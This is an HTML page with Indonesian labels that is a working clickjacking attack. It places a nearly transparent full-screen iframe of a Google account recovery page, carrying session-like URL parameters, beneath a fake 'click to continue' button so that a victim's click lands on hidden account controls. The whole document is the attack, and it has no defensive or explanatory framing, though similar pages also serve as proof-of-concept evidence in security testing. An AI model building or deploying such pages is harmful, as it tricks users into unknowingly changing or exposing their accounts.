<!DOCTYPE html>
<html>
  <head>
    <title>Langkah Selanjutnya</title>
    <style>
      iframe {
        position: absolute;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        opacity: 0.1; /* Transparansi untuk menutupi elemen */
        z-index: 2; /* Menempatkan iframe di atas halaman */
      }

      button.fake {
        position: absolute;
        top: 300px;
        left: 50px;
        z-index: 3;
        font-size: 30px;
        padding: 20px;
        background-color: #4CAF50;
        color: white;
        border: none;
        cursor: pointer;
      }

      h2 {
        z-index: 4;
        position: absolute;
        top: 200px;
        left: 50px;
        font-size: 24px;
      }
    </style>
  </head>
  <body>
    <h2>Langkah Selanjutnya</h2>
    <button class="fake">Klik untuk melanjutkan</button>
    <iframe src="https://accounts.google.com/u/0/recovery/summary?hl=id&service=mail&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Fauthuser%3D0&eprsic=ANslDjw-8kaHseHQXrC1Bh5jCnH6ad_BZqdtplSxVPzyVi3tkCAd1-PLrtrTJB78Ye8cqWsN1vzmvJmL-i625ilUHbQ0fr-G0Gl6TBjmN8zGqTELB-pmhuRTa4ca1O2RU2FEMYW5o_1-wZtKIpalLO4u7JlaMFXvScBuJT0CGzkjKaGKdoYnu-Y2K8egp9O08lqRZOvsivdNG--0vm0NzXpVMA_1XrvYxsPipSiS0szsYyO9l_-NiBk&rapt=AEjHL4PdR2-YglGiSu8yxHn4As5zN7gb1Ditl8EszQuA3CEWuf6zMwwrE_1J8vanaZmZlNtgKTD2wLvJM9KIDFXHXTHSiA-lug"></iframe>
  </body>
</html>

